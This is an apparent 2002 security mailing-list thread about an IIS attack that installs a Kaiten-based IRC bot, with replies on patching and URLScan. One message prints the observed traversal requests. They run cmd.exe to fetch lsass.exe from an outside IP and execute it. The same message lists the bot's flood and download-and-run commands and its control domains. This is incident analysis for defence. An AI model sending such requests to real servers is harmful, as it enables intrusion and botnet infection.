-----Original Message-----
From: zeno [mailto:bugtraq () cgisecurity net]
Sent: Tuesday, September 24, 2002 2:08 PM
To: John Campbell
Cc: incidents () securityfocus com
Subject: Re: new IIS worm? (rcp lsass.exe)
Windows Update from you-know-who actually does what you
describe. I'd
always been leery of it, but tried it out recently when
setting up a
W2K test server, and it performed as advertised. It did
take several
iterations to get everything updated, owing to various dependencies.
When I used windows update it downloaded the patches but
didn't install them. I had to manually go through each one.
While this isn't a big deal I am looking for something 100
percent automated with install of the patches. Perhaps I'm
missing something I deal mostly with unix.
- zeno
Regards,
John Campbell, CISSP, GCWN
Information Security Engineer
Washington School Information Processing Cooperative
(WSIPC)
Everett, Washington, USA
-----Original Message-----
From: zeno [mailto:bugtraq () cgisecurity net]
Sent: Tuesday, September 24, 2002 11:29 AM
To: Mark Challender
Cc: 'pj () esec dk'; incidents () securityfocus com
Subject: Re: new IIS worm? (rcp lsass.exe)
Hardening of IIS with the tools available at Microsoft and using
URLSCAN with the EXE blocking on will stop these attacks.
Patch, patch, patch, recheck the patches and use URLSCAN!
Does anyone know of a gui windows tool that scans your system and
provides you with a list of needed patches, and then allows you to
select, and have it autodownload and install them? I can't seem to
find one (needed mostly for iis).
- zeno () cgisecurity com
Mark Challender
Network Administrator
==================
Veni, Vidi, Geeki
==================
-----Original Message-----
From: pj () esec dk [mailto:pj () esec dk]
Sent: Monday, September 23, 2002 3:27 AM
To: incidents () securityfocus com
Subject: Re: new IIS worm? (rcp lsass.exe)
Christian Mock:
Then it seems to go after the web servers, sending the following:
GET
/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:ls
as
s.exe+
.
HTTP/1.0..
and
GET
/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0
I've been able to get hold of that lsass.exe binary
(9728 bytes),
but
I lack the skills to analyze it; I'll happily mail it to anybody
who
asks.
We have seen this attack from 4 different sources since Sept. 16,
and
have informed the owner of 64.21.95.7 and downloaded the
lsass.exe for
investigation.
Based on the attack rate this is most likely a scripted or manual
attack, not a worm.
Judging from the embedded string in this compressed binary it
appears to be an IRC bot based on the kaiten.c code written by
contem () efnet, the author of the Slapper worm :
Kaiten Win32 API version 2002 by contem () efnet
The binary contains these domainnames, most likeky IRC
servers used
for controlling the bot:
telsa5.mine.nu (Korea)
irc.logicfive.net (Taiwan)
moncredo.shacknet.nu (USA)
telsacredo.shacknet.nu (USA)
lar.ath.cx (Taiwan)
The program accepts commands to make various DOS attacks
or download
new version or executables with http:
NOTICE %s :PUSH <target> <port> <secs> = A push flooder
NOTICE %s :TCP <target> <port> <secs> = A syn flooder
NOTICE %s :UDP <target> <port> <secs> = A udp flooder
NOTICE %s :MCON <target> <port> <times> = A connectbomb flooder
NOTICE %s :NICK <nick> = Changes the nick of the
client
NOTICE %s :DISABLE <pass> = Disables all
packeting from
this
client
NOTICE %s :ENABLE <pass> = Enables all
packeting from
this
client
NOTICE %s :UPDATE <http address> = Downloads a
file off the
web and
updates the client
NOTICE %s :RUN <http address> = Downloads a
file off the
web and
runs it
NOTICE %s :GET <http address> = Downloads a
file off the
web
NOTICE %s :ADDSERVER <server> = Adds a server
to the list
NOTICE %s :DELSERVER <server> = Deletes a
server from the
list
NOTICE %s :LISTSERVERS = Lists server
on the list
NOTICE %s :KILL = Kills the client
NOTICE %s :VERSION = Requests
version of client
NOTICE %s :HELP = Displays this
There seems also to be a default account and password in
the german
language included in this specific version of Kaiten.
The IIS attack that tries to inject this Trojan usually
has another
URL with "CONNECT chat.vtm.be:6667". This is an attempt
to proxy an
connection to port 6667(IRC) on chat.vtm.be.
Peter Jelver
...
eSec A/S
http://www.esec.dk
......................................................................
......
.
PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F E687 BB8A
128F D85C A7D7
--------------------------------------------------------------------
--
------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
--------------------------------------------------------------------
--
------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
----------------------------------------------------------------------
--
----
This list is provided by the SecurityFocus ARIS analyzer
service. For
more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
--------------------------------------------------------------
--------------
This list is provided by the SecurityFocus ARIS analyzer
service. For more information on this free incident handling,
management
and tracking system please see: http://aris.securityfocus.com
Intro
